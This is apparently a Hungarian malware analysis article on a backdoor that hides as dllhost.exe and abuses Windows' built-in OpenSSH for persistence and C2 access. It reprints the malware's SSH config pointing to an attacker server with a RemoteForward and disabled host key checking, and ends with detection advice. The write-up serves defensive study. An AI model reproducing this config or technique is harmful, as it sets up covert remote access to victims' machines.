Az OpenSSH a biztonságos távoli elérés egyik legismertebb és legmegbízhatóbb eszköze. Eredetileg Linux alapú rendszerekhez fejlesztették ki, de a Microsoft 2018-as Windows 10 1803 verziójával hivatalosan is beépítette a Windows operációs rendszer alapértelmezett komponensei közé. Az OpenSSH gyors terjedése és integrációja lehetőséget biztosított a támadók számára is, akik kihasználják az eszközt a Living Off the Land Binary (LOLBIN) technikák során. Ezt a módszert az jellemzi, hogy a támadók létező, megbízhatónak tartott rendszerszolgáltatásokat használnak ki saját, rosszindulatú céljaik elérésének érdekében, mint például a már fentebb említett OpenSSH szolgáltatás. Az OpenSSH képes tartós hozzáférést biztosítani (persistence). Mivel egy megbízható rendszeralkalmazásról van szó, így elkerüli a hagyományos védelmi rendszerek figyelmét, ezáltal rejtve maradhat a káros tevékenység.
A káros tevékenységek a következők lehetnek:
Rendszerszolgáltatás kihasználása – Az SSH-hoz való hozzáférés biztosítása
A vizsgált kártevő dllhost[.]exe néven álcázza magát, ami egy ismert és teljesen legitim Windows folyamat. Ez a folyamat végzi el az OpenSSH kapcsolatok inicializálását, amelyeket a támadó irányít. A kártevő első lépése, hogy megpróbálja elindítani a SSHService szolgáltatást, amely a Windows rendszerben az OpenSSH szolgáltatást biztosítja. Amennyiben ez a lépés nem sikerül, a kártevő registry kulcsokat módosít, és egy új, véletlenszerű portot választ a jövőbeli kapcsolatok számára.
Registry Manipuláció – A Portszám Tárolása
A kártevő a Windows registry-ben tárolja el a választott portszámot, amelyet a következő alkalommal fog használni a támadó SSH kapcsolatainak kiépítésére. A SOFTWARE\SSHservice kulcsba mentett port lehetővé teszi, hogy a kártevő újraindítás után is ugyanazon a porton próbálkozzon. Ezt a módszert sok fejlett támadás alkalmazza, mivel a Windows registry egy megbízható és gyakran figyelmen kívül hagyott perzisztencia mechanizmus.
SSH Konfigurációs Fájl Létrehozása – Port Továbbítás és C2 Kommunikáció
A kártevő egy egyedi SSH konfigurációs fájlt hoz létre a c[:]\windows\temp\config könyvtárban. Ez a fájl tartalmazza a támadó által használt Command and Control (C2) szerver IP címét, a portot, valamint a szükséges felhasználói hitelesítési adatokat. A konfigurációs fájlban szereplő RemoteForward beállítás egy port továbbítást próbál létrehozni, amely lehetővé teszi, hogy a támadó a fertőzött gépen keresztül kapcsolatba lépjen a hálózattal.
A konfiguráció így néz ki:
Host version
Hostname 193[.]187[.]174[.]3
User ugueegfueuagu17t1424acs
Port 443
ServerAliveInterval 60
ServerAliveCountMax 15
RemoteForward 40909
StrictHostKeyChecking no
SessionType None
Bár a RemoteForward paraméter szintaxisában hiba található (hiányzik a local_address:local_port része), a támadó szándéka világos: biztosítani szeretné a porttovábbítást és a távoli hozzáférést.
Folyamatos Kapcsolódási Kísérletek – Végtelen Ciklus
A kártevő egy végtelen ciklusban fut, amely minden egyes időszakos sleep után megpróbálja újraindítani az ssh[.]exe binárist a korábban létrehozott konfigurációval. Ez a megközelítés biztosítja, hogy a kártevő folyamatosan próbálkozzon a támadó C2 szerveréhez való csatlakozással, még akkor is, ha a kapcsolat időszakosan megszakad.
A Védekezés Kihívásai
A támadók fő kihívása, hogy elkerüljék a detektálást, miközben hozzáférést biztosítanak a fertőzött rendszerekhez. Az OpenSSH használata jelentős előnyt biztosít számukra, mivel így rejtett módon van lehetőség kihasználni a már meglévő, legitim eszközöket.
A következő technikák jelentős kihívást jelentenek a hagyományos védelmi mechanizmusok számára:
Registry Manipuláció
A Windows registry manipuláció egy jól ismert és elterjedt perzisztenciát biztosító technika, amelyet a kártevők gyakran alkalmaznak, mivel a regisztrációs adatbázis módosítása általában elkerüli a hagyományos vírusirtó programokat, amelyek nem mindig figyelnek a regisztrációs kulcsok változásaira.
LOLBIN Használat
A LOLBIN (Living Off the Land Binary) módszer a támadók egyik leggyakrabban használt taktikája, ahol a rendszeres, megbízhatónak tartott binárisokat (jelen esetben az ssh[.]exe-t) használják a támadások során. Mivel az ssh[.]exe alapértelmezett alkalmazás a Windows rendszerben, a támadók könnyedén elkerülhetik a szignatúraalapú detekciós rendszereket.
Folyamat-Azonosítás és Maszkolás
A dllhost[.]exe néven futó kártevő folyamat gyakran használt, legitim Windows szolgáltatás neve. Az olyan folyamatok, amelyek egy ismert és legitimitásukról elismert Windows rendszerfolyamat nevében futnak, jelentős nehézségeket okoznak az észlelésben.
Védekezési Stratégiák
Rendszerintegritás Ellenőrzése és Monitoring
A rendszer folyamatos ellenőrzése alapvetően fontos. A támadók által módosított vagy újraindított folyamatok és a registry kulcsok változásainak monitorozása segíthet felismerni a próbálkozásokat.
SSH Konfigurációk és Logok Figyelése
Mivel a kártevő a c[:]\windows\temp könyvtárban hozza létre az SSH konfigurációkat, fontos figyelni a rendszerben megjelenő szokatlan fájlokat, különösen az SSH konfigurációs fájlokkal kapcsolatosan.
Folyamatfigyelés és Maszkolás Elleni Védelem
A folyamatfigyelés és a folyamat-maszkolás elleni védelem alapvető eszközei a támadások detektálásának. A gyanús, ismert nevű (pl. dllhost[.]exe) folyamatok futtatásának észlelése segíthet megelőzni a rejtett kártevők működését.
Az OpenSSH és a hozzá hasonló rendszerszolgáltatások kihasználása egyre gyakoribbá válik a támadók körében. A hagyományos detektáló rendszerek számára a LOLBIN technikák és az OpenSSH szolgáltatásainak támadási célpontként való felhasználása különösen nehezen észlelhető. Ezért a biztonsági szakembereknek a viselkedésalapú monitorozásra, a registry és SSH konfigurációs fájlok figyelésére, valamint az integritásellenőrzésre kell összpontosítaniuk, hogy megelőzzék az ilyen típusú támadásokat. Az ilyen technikák észleléséhez és blokkolásához rendszeres auditok, képzések és elemzések szükségesek. A rendszerintegritás és a viselkedésalapú észlelés kulcsfontosságú ahhoz, hogy megvédjük infrastruktúránkat az OpenSSH alapú backdoor-ral szemben.